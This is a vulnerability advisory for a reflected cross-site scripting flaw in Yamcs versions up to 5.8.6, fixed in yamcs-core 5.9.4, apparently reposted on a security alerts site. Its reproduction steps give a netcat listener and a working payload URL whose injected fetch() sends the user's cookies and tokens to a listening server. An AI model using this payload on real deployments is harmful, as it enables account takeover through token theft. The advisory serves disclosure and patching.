GHSA-rxpg-wjf8-qv9c: XSS

Published Aug 28, 2026
·
Updated

Attack type:  Unauthenticated remote

Impact: Attackers can execute arbitrary JavaScript in a user's browser, including obtaining a user's session token and refresh token.

Affected components: authorize.html, AuthHandler.java, HandlerContext.java

A Reflected Cross-Site Scripting vulnerability exists in Yamcs <=5.8.6, allowing an attacker to execute arbitrary JavaScript in a Yamcs user's browser. This vulnerability can be exploited to exfiltrate a logged-in user's access token and send it to a remote server, leading to the takeover of the user's account.

Using a specially crafted URL, you are able to execute a JavaScript alert() call in the browser:

<img width="1794" height="816" alt="image" src="https://github.com/user-attachments/assets/4a5b6aa4-bceb-4b3d-bc5d-3dac0895ff2e" />

You then use JavaScript to obtain the user's cookies and display them in the alert:

<img width="1794" height="1290" alt="image" src="https://github.com/user-attachments/assets/6c6d2837-db77-409a-a66d-0d2e4edd5435" />

Finally, use the fetch function to send the user's cookies to a remote server which we controlled:

<img width="2370" height="1025" alt="image" src="https://github.com/user-attachments/assets/2989fc79-6ca0-4256-afc4-71d44d9923b8" />

Now you can set these cookies in our own browser and login to Yamcs as the user.

Steps to Reproduce 1. Start Yamcs 2. Login as a user 3. In a terminal, start a netcat listener:

nc -nlvp 8888

4. Paste the following URL payload in the browser

http://localhost:8090/auth/authorize?clientid=yamcs-web&state=Lw&responsemode=query&responsetype=code&scope=openid&redirecturi=http%3A%2F%2Flocalhost:8090%2Fcbi0i7y"><script>fetch(http://localhost:8888?c=${document.cookie})<%2Fscript>ekuou

5. You will receive a connection on your netcat listener containing the user's access token and refresh token.

Acknowledgements This vulnerability was discovered by Abderrahim Dahmani while solving a STARPWN 2025 CTF challenge at DEFCON 33 offered by VisionSpace Technologies.

Affected Software

1 affected componentFixes available
maven/org.yamcs:yamcs-core<5.9.4
5.9.4

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade maven/org.yamcs:yamcs-core to a version that resolves this vulnerability.

    Fixed in 5.9.4

Event History

Aug 28, 2026
Advisory Published
via GitHub·05:17 PM
Data Sourced
via GitHub·05:17 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which users are at risk of account takeover?

Yamcs users who are logged in and visit an attacker-crafted URL are at risk. The injected JavaScript can obtain session or refresh tokens and send them to an attacker-controlled server.

2

Does an attacker need a Yamcs account to exploit this issue?

No. The attack is described as unauthenticated and remote, but it requires convincing a user to open a specially crafted URL.

3

How can I determine whether my deployment is affected?

Deployments using yamcs-core versions 5.8.6 or earlier are affected according to the advisory. The vulnerable components include authorize.html, AuthHandler.java, and HandlerContext.java.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203